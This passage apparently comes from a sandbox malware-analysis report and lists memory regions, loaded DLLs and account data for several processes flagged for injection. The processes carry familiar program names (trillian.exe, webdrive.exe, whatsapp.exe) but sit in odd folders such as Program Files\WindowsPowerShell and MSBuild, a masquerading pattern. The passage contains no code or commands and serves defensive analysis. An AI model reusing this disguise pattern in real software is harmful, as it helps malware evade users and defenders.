mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2638 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2639 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2640 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2641 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2642 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2643 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2644 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2645 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2646 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2647 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2648 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2649 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2650 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2651 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2652 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2653 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2655 start_va = 0xc10000 end_va = 0xd72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Thread: id = 128 os_tid = 0x1048 Thread: id = 129 os_tid = 0x1038 Process: id = "31" image_name = "trillian.exe" filename = "c:\\program files\\windowspowershell\\trillian.exe" page_root = "0x40b75000" os_pid = "0x103c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\WindowsPowerShell\\trillian.exe\" " cur_dir = "C:\\Program Files\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2656 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2657 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2658 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2659 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2660 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2661 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2662 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2663 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2664 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2665 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2666 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2667 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2668 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2669 start_va = 0x510000 end_va = 0x5cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2670 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2671 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2672 start_va = 0x8d0000 end_va = 0x8e6fff monitored = 0 entry_point = 0x8d14a1 region_type = mapped_file name = "trillian.exe" filename = "\\Program Files\\WindowsPowerShell\\trillian.exe" (normalized: "c:\\program files\\windowspowershell\\trillian.exe") Region: id = 2673 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 2674 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 2675 start_va = 0x1e80000 end_va = 0x1f3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 2676 start_va = 0x1fb0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 2677 start_va = 0x2000000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2678 start_va = 0x2010000 end_va = 0x29d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002010000" filename = "" Region: id = 2679 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2680 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2681 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2682 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2683 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2684 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2685 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2686 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2687 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2688 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2689 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2690 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2691 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2692 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2693 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2694 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2695 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2696 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2697 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2698 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2699 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2700 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2701 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2702 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2703 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2704 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2706 start_va = 0x29e0000 end_va = 0x2b78fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Thread: id = 130 os_tid = 0x1060 Thread: id = 131 os_tid = 0x1040 Process: id = "32" image_name = "webdrive.exe" filename = "c:\\program files (x86)\\windowspowershell\\webdrive.exe" page_root = "0x76a8f000" os_pid = "0x104c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2707 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2708 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2709 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2710 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2711 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2712 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2713 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2714 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2715 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2716 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2717 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2718 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2719 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2720 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2721 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2722 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2723 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 2724 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 2725 start_va = 0xb30000 end_va = 0xbebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 2726 start_va = 0xcb0000 end_va = 0xcbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2727 start_va = 0xd50000 end_va = 0xd66fff monitored = 0 entry_point = 0xd514a1 region_type = mapped_file name = "webdrive.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\webdrive.exe") Region: id = 2728 start_va = 0xd70000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 2729 start_va = 0x2170000 end_va = 0x2b33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 2730 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2731 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2732 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2733 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2734 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2735 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2736 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2737 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2738 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2739 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2740 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2741 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2742 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2743 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2744 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2745 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2746 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2747 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2748 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2749 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2750 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2751 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2752 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2753 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2754 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2755 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2757 start_va = 0x2b40000 end_va = 0x2c95fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b40000" filename = "" Thread: id = 132 os_tid = 0x105c Thread: id = 133 os_tid = 0x1050 Process: id = "33" image_name = "whatsapp.exe" filename = "c:\\program files\\msbuild\\whatsapp.exe" page_root = "0x798aa000" os_pid = "0x1054" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\MSBuild\\whatsapp.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2758 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2759 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2760 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2761 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2762 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2763 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2764 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2765 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2766 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2767 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2768 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2769 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2770 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2771 start_va = 0x450000 end_va = 0x50dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2772 start_va = 0x510000 end_va = 0x5cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2773 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2774 